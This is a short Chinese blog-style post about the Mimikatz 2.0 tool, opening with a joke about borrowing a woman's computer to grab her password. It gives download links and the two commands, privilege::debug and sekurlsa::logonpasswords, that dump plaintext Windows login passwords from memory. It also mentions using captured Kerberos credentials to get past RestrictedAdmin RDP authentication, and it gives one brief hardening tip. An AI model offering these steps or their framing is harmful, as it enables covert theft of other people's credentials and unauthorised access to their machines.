只要借电脑,轻松搞定密码……“女神,可以借电脑看看吗?”大家都知道,渗透测试的常用工具。法国一位人才编写的轻量级调试器可以帮助安全测试人员捕获Windows密码。Mimikatz最近发布了2.0版本,这使得捕获密码的命令更加简单。估计笔者看到对这个神器研究最多的就是直接抓取密码,以至于神马不放出直接一键版,哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭证绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)登录认证。建议默认禁用RestrictedAdmin模式登录。更多功能等你发现神器博客http://blog.gentilkiwi.com/mimikatz直接下载地址https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140614这是我的电脑密码截图,被遮住的部分是我的电脑密码,我的电脑win764位。所以使用x64artifact2.0版本只需要两条命令,比之前的版本更加简单。***条:privilege::debug//提升权限第二条:sekurlsa::logonpasswords//抓取密码
